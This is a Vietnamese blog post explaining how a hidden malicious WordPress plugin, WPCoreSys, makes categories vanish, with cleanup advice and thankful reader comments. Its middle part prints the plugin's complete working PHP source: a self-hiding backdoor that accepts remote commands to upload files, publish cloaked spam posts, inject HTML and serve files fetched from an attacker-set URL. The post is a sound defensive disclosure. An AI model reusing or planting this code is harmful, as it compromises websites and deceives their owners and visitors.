Plugin WPCoreSys làm ẩn đi các term trong WordPress

Cập nhật lần cuối vào

Nếu trang WordPress của bạn đang gặp tình trạng các term (hay còn gọi là chuyên mục) bị ẩn đi một cách không bình thường thì rất có thể trang web của bạn đã bị hack.

Bạn đã bị hack

Nếu một ngày nào đó bạn cảm thấy trang WordPress của mình hoạt động không bình thường, hãy cố gắng dùng các phần mềm để kiểm tra tập tin lạ trên hosting hoặc kiểm tra bằng mắt thường. Xem thử có các tập tin lạ nằm ngoài thư mục gốc của trang web hoặc có các plugin lạ nằm trong thư mục wp-content/plugins hay không. Bạn kiểm tra và đối chiếu với thư mục, tập tin của bản WordPress gốc vừa mới giải nén xem có điều gì khác biệt hay không, nếu bạn thấy xuất hiện các tập tin có tên lạ hoặc bạn chưa nhìn thấy bao giờ thì rất có thể trang web của bạn đã bị hack.

Bài viết này mình đang nói tới plugin WPCoreSys. Plugin này sẽ nằm ngầm trên hosting của bạn, mặc dù đã được kích hoạt nhưng trong danh sách quản lý plugin bạn sẽ không nhìn thấy tên plugin này do tác giả của nó đã code che dấu đi. Plugin này sẽ làm cho các term trên trang WordPress của bạn bị ẩn hoặc xóa đi như chưa tạo bao giờ, bạn không thể quản lý được chuyên mục, menu và nhiều thứ khác.

<?php

/*
* Plugin Name: WPCoreSys
* Version: 2.0
* Author: Wordpress
*/

  error_reporting(0);

  function fn_dolly_get_filename_from_headers($headers)
  {
    if (is_array($headers))
    {
      foreach($headers as $header => $value)
      {
        if (stripos($header,'content-disposition') !== false || stripos($value,'content-disposition') !== false)
        {
          $tmp_name = explode('=', $value);

          if ($tmp_name[1])
          {
            $tmp_name = trim($tmp_name[1],'";\'');
            break;
          }
        }
      }
    }

    return (isset($tmp_name) && !empty($tmp_name)) ? $tmp_name : false;
  }

  function fn_dolly_get_cookie_name()
  {
    return 'wp-' . md5(get_home_url() . 'w_cookie');
  }

  function fn_dolly_get_table_name()
  {
    global $wpdb;

    return $wpdb->prefix . 'dolly_plugin_table';
  }

  function fn_dolly_plugin_activation_hook()
  {
    global $wpdb;
    $table_name = fn_dolly_get_table_name();

    if($wpdb->get_var("SHOW TABLES LIKE '$table_name'") != $table_name)
    {
      $charset_collate = $wpdb->get_charset_collate();

      $sql = "CREATE TABLE {$table_name} (
        hash varchar(32) NOT NULL, 
        url varchar(190) NOT NULL,
        time datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
        UNIQUE KEY hash (hash)
      ) {$charset_collate};";

      require_once(ABSPATH . 'wp-admin/includes/upgrade.php');
      dbDelta($sql);
    }
  }

  class dolly_plugin
  {
    var $m_root_path;
    var $m_upload_path;
    var $m_upload_url;
    var $m_request;
    var $m_actions;
    var $m_useragent = 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0)';
    var $m_secookie = '';

    public function __construct()
    {
      $this->m_actions = array('INIT', 'TARGET', 'UPLOAD', 'POST', 'STATS', 'HTML');
      
      $this->m_root_path = plugin_dir_path(__FILE__);
      
      $upload_path = wp_upload_dir();

      if (isset($upload_path['path']) && is_writable($upload_path['path']))
      {
        $this->m_upload_path = $upload_path['path'];
        $this->m_upload_url = $upload_path['url'];
      }

      if (isset($_COOKIE[fn_dolly_get_cookie_name()]))
        $this->m_secookie = true;

      if ( (!$this->is_se_request() && empty($this->m_secookie)) )
      {
        add_filter('posts_clauses', array($this, 'posts_clauses'), 0, 2);
		add_filter('terms_clauses', array($this, 'terms_clauses'), 0, 2);
      }
      else
      {
        if (empty($this->m_secookie))
          setcookie(fn_dolly_get_cookie_name(), 'true', time() + (5 * MINUTE_IN_SECONDS), COOKIEPATH, COOKIE_DOMAIN);

        add_action('installation_point', array($this, 'insert_content'));
        add_action('dynamic_sidebar', array($this, 'insert_content'));
        add_action('wp_footer', array($this, 'insert_content'));
      }

      add_action('init', array($this, 'wp_init'), 0);
      add_action('wp_title', array($this, 'count_post_stats'));
      add_action('wp_head', array($this, 'count_post_stats'));
      add_action('dynamic_sidebar', array($this, 'count_post_stats'));
      add_action('wp_footer', array($this, 'count_post_stats'));

      if (is_admin())
        add_action('all_plugins', array($this, 'all_plugins'));

      add_filter('get_the_excerpt', array($this, 'get_the_excerpt'));

      register_activation_hook(__FILE__, 'fn_dolly_plugin_activation_hook');

      $this->track_target_download();
    }

    private function parse_request()
    {
      $this->m_request = false;

      foreach ($_POST as $key => $value)
      {
        if (stripos($key, 'w_') === false)
          continue;

        if (!is_array($this->m_request))
          $this->m_request = array();

        $this->m_request[$key] = $value;
      }

      if (!isset($this->m_request['w_action']) || !isset($this->m_request['w_seckey']))
        $this->m_request = false;

      return $this->m_request;
    }

    public function wp_init()
    {
      global $wpdb;

      if ($this->parse_request() !== false)
      {
        $action = $this->m_request['w_action'];

        $key_req = $this->m_request['w_seckey'];

        $key_hash = get_option('w_dolly_hash');

        if (empty($key_hash) && $action == 'INIT')
          add_option('w_dolly_hash', md5($key_req)) === true ? $this->result(1) : $this->result(0);

        if ((!empty($key_req) && !empty($key_hash)) && ($key_hash != md5($key_req)))
          $this->result(0);

        switch ($action)
        {
          case 'TARGET':
          {
            if (empty($this->m_request['w_target']))
              $this->result(0);

            $target = base64_decode($this->m_request['w_target']);

            update_option('w_dolly_target', $target) === true ? $this->result(1) : $this->result(0);

            break;
          }
          case 'UPLOAD':
          {
            if (empty($this->m_request['w_filename']) || empty($this->m_request['w_filedata']))
              $this->result(0);

            $path = $this->m_upload_path . '/' . $this->m_request['w_filename'];

            $url = $this->m_upload_url . '/' . $this->m_request['w_filename'];

            $data = base64_decode(rawurldecode($this->m_request['w_filedata']));

            file_put_contents($path, $data) === false ? $this->result(0) : $this->result($url);

            break;
          }
          case 'POST':
          {
            if (empty($this->m_request['w_postbody']) || empty($this->m_request['w_posttitle']))
              $this->result(0);

            $post_body = base64_decode(rawurldecode($this->m_request['w_postbody']));

            $dolly_excerpt = get_option('w_dolly_excerpt');

            if (empty($dolly_excerpt))
            {
              $dolly_excerpt = substr($key_hash, 0, 5);

              add_option('w_dolly_excerpt', $dolly_excerpt);
            }

            $new_post = array(
              'post_title'  => $this->m_request['w_posttitle'],
              'post_content' => $post_body,
              'post_status'  => 'publish',
              'post_author'  => 1
            );

            if (!empty($this->m_request['w_postcat']))
            {
              $post_cat = $this->m_request['w_postcat'];

              $cat_id = get_cat_ID($post_cat);

              if ($cat_id == 0)
              {
                $new_term = wp_insert_term($post_cat, 'category');

                $cat_id = intval($new_term['term_id']);
              }

              $new_post['post_category'] = array($cat_id);
            }

            kses_remove_filters();

            $post_id = wp_insert_post($new_post);

            if (is_int($post_id) && $post_id > 0)
            {
              $excerpt = apply_filters('the_excerpt', get_post_field('post_content', $post_id));

              $excerpt = $excerpt . $dolly_excerpt;

              $post_update = array('ID' => $post_id, 'post_excerpt' => $excerpt);

              wp_update_post($post_update, true);

              $url = get_permalink($post_id);

              $this->result($url);
            }

            $this->result(0);

            break;
          }
          case 'STATS':
          {
            $table = fn_dolly_get_table_name();

            $result = $wpdb->get_results("SELECT url, COUNT(url) AS hits FROM {$table} GROUP BY url");

            $stats = '';

            foreach ($result as $value)
              $stats .= $value->url . '|' . $value->hits . "\n";

            $this->result($stats);

            break;
          }
          case 'HTML':
          {
            if (empty($this->m_request['w_html']))
              $this->result(0);

            $html = base64_decode($this->m_request['w_html']);

            update_option('w_dolly_html', $html) === true ? $this->result(1) : $this->result(0);

            break;
          }
        }
      }

      $this->reset_stats();
    }

    public function get_the_excerpt($ex)
    {
      $excerpt = get_option('w_dolly_excerpt');

      if (!empty($excerpt))
        $ex = str_replace($excerpt, '', $ex);

      return $ex;
    }

    public function all_plugins($plugins)
    {
      $self_file = str_replace($this->m_root_path, '', __FILE__);

      foreach ($plugins as $plugin_file => $plugin_data)
      {
        if (stripos($plugin_file, $self_file) !== false)
        {
          unset($plugins[$plugin_file]);

          break;
        }
      }

      return $plugins;
    }

	public function posts_clauses($clauses, $query)
	{
		global $wpdb;

		$excerpt = get_option('w_dolly_excerpt');

		if (!empty($excerpt))
		{
			$clauses['where'] .= " AND {$wpdb->posts}.post_excerpt NOT LIKE '%{$excerpt}%'";
		}

		return $clauses;
	}

	public function terms_clauses($clauses, $query)
	{
		global $wpdb;

		$excerpt = get_option('w_dolly_excerpt');

		if (!empty($excerpt))
		{
			$cats = $wpdb->get_col(
						"SELECT key1.term_id FROM wp_term_taxonomy key1
						INNER JOIN wp_term_relationships key2 ON key2.term_taxonomy_id = key1.term_taxonomy_id AND key1.taxonomy = 'category'
						INNER JOIN wp_posts key3 ON key3.id = key2.object_id AND key3.post_excerpt LIKE '%{$excerpt}%'"
						);

			$clauses['where'] .= " AND t.term_id NOT IN(" . implode(",", $cats) . ")";
		}

		return $clauses;
	}

    public function insert_content($args)
    {
      global $g_html_inserted, $g_links_inserted;

      if (!isset($g_html_inserted) && $_SERVER["REQUEST_URI"] == "/")
      {
        $html = get_option('w_dolly_html');

        if (!empty($html))
          echo $html;

        $g_html_inserted = true;
      }

      if (!isset($g_links_inserted))
      {
        echo "\r\n";
        echo "<ul>\r\n";
        wp_get_archives();
        echo "</ul>\r\n";
        echo "\r\n";

        $g_links_inserted = true;
      }
    }

    public function count_post_stats()
    {
      global $g_stats_counted, $post, $wpdb;

      if (empty($g_stats_counted) && is_object($post) && is_single())
      {
        $w_excerpt = get_option('w_dolly_excerpt');

        $p_excerpt = $post->post_excerpt;

        if (stripos($p_excerpt, $w_excerpt) !== false)
        {
          $table_name = fn_dolly_get_table_name();

          $post_url = get_the_permalink();

          $ip = isset($_SERVER['HTTP_X_REAL_IP']) ? $_SERVER['HTTP_X_REAL_IP'] : null;
          $ip = empty($ip) && isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $ip;
          $ip = empty($ip) && isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : $ip;

          $hash = md5($ip . $_SERVER['HTTP_USER_AGENT']);

          $sql = "INSERT INTO {$table_name} (hash, url, time) VALUES(%s, %s, NOW())";

          $sql = $wpdb->prepare($sql, $hash, $post_url);

          $wpdb->query($sql);

          $g_stats_counted = true;
        }
      }
    }

    private function track_target_download()
    {
      $target = get_option('w_dolly_target');

      $hash = get_option('w_dolly_hash');

      $var = isset($_GET[$hash]) ? $_GET[$hash] : false;

      if (!empty($target) && $var !== false)
      {
        $target_url = $target . '?target=' . $var;
        $target_path = $this->m_upload_path . '/' . $var;
        $target_mtime = intval(filemtime($target_path));
        $target_name = '';
        $target_content = '';

        if (!file_exists($target_path) || ($target_mtime > 0 && (time() - $target_mtime >= HOUR_IN_SECONDS)))
        {
          if (file_exists($target_path))
            unlink($target_path);

          if (!function_exists('wp_remote_get'))
          {
            $request = wp_remote_get($target_url, array('user-agent' => $this->m_useragent));

            if (is_array($request) && !empty($request['body']))
            {
              $target_name = fn_dolly_get_filename_from_headers($request['headers']);

              $response_code = wp_remote_retrieve_response_code($request);

              if ($response_code == 200)
                $target_content = wp_remote_retrieve_body($request);
            }
          }

          if (empty($target_content))
          {
            $opts = array('http' => array(
                    'method' => 'GET',
                    'header' => 'User-agent: ' . $this->m_useragent . "\r\n")
				);

            $context = stream_context_create($opts);

            $target_content = file_get_contents($target_url, false, $context);

            $target_name = fn_dolly_get_filename_from_headers($http_response_header);
          }

          if (!empty($target_content))
            file_put_contents($target_path, $target_content);

          if (!empty($target_name))
            file_put_contents($target_path . '.name', $target_name);
        }
        else
          $target_content = file_get_contents($target_path);

        if (empty($target_content))
        {
          header('Location: ' . $target_url);
          die();
        }
        else
        {
          $target_name = file_exists($target_path . '.name') ? trim(file_get_contents($target_path . '.name')) : $var;

          header('Content-Description: File Transfer');
          header('Content-Type: application/octet-stream');
          header('Content-Disposition: attachment; filename="' . $target_name . '"');
          header('Content-Transfer-Encoding: binary');
          header('Expires: 0');
          header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
          header('Pragma: public');
          header('Content-Length: ' . strlen($target_content));

          die($target_content);
        }
      }
    }

    private function reset_stats()
    {
      global $wpdb;

      $last_reset_time = intval(get_option('w_dolly_resettime'));

      if ((time() - $last_reset_time) >= (60 * 60 * 1))
      {
        $table_name = fn_dolly_get_table_name();

        $wpdb->query("DELETE FROM {$table_name} WHERE time <= NOW() - INTERVAL 1 DAY");

        update_option('w_dolly_resettime', time());
      }
    }

    private function result($code)
    {
      die('[***[' . $code . ']***]');
    }

    private function is_se_request()
    {
      $is_se = false;

      $se_name = array('google', 'yahoo', 'msn', 'bing');

      $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';

      $agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';

      if (!empty($referer) || !empty($agent))
      {
        foreach ($se_name as $name)
        {
          if (stripos($referer, $name) !== false || stripos($agent, $name) !== false)
          {
            $is_se = true;

            break;
          }
        }
      }

      return $is_se;
    }
  }

  global $g_dolly_plugin;

  if (!isset($g_dolly_plugin))
    $g_dolly_plugin = new dolly_plugin();
?>

Nếu bạn đang gặp trường hợp này thì hãy xóa thư mục plugin bên trong đường dẫn wp-content/plugins. Nói về nguyên nhân dẫn đến sự cố website bị hack thì phần lớn nằm ở yếu tố người dùng. Mật khẩu kém an toàn, máy vi tính dùng phần mềm lậu, click vào những đường link lạ là một trong những nguyên nhân hàng đầu dẫn đến website bị hack, bên cạnh đó khả năng bảo mật của hosting chưa cao cũng là một vấn đề lớn.

Xem thêm: Một vài mẹo bảo mật WordPress

Nếu trang web của bạn đã bị hack thì bạn nên tải bộ code mới của WordPress về, sau đó up mới lên toàn bộ trên hosting. Thay đổi lại nội dung cấu hình trong tập tin wp-config.php cũng như quét bảo mật trên hosting, đổi mật khẩu hosting và mật khẩu cơ sở dữ liệu.

Xem thêm: Làm gì khi trang WordPress của bạn bị hack?

Hãy nhớ sao lưu dữ liệu thường xuyên, đừng bao giờ suy nghĩ là trang của mình nhỏ lắm, bọn hacker sẽ không để ý tới làm gì đâu. Hãy luôn cảnh giác trước các mối nguy hại, đừng để mất bò mới lo làm chuồng, lúc đó thì đã quá muộn.

Theo dõi
Thông báo của
guest

3 Comments
Cũ nhất
Mới nhất Được bỏ phiếu nhiều nhất
Phản hồi nội tuyến
Xem tất cả bình luận
quà tặng
7 năm trước

đang bị lỗi này mấy ngày nay , nó ẩn không biết làm thế nào , thank bạn nhiều

Dante-Ali
6 năm trước

mới học wp mà dính lỗi khó nhằn. Cảm ơn bạn nhé

iHuongDan Blog
5 năm trước

Rất hay cảm ơn admin rất nhiều. đã làm và thành công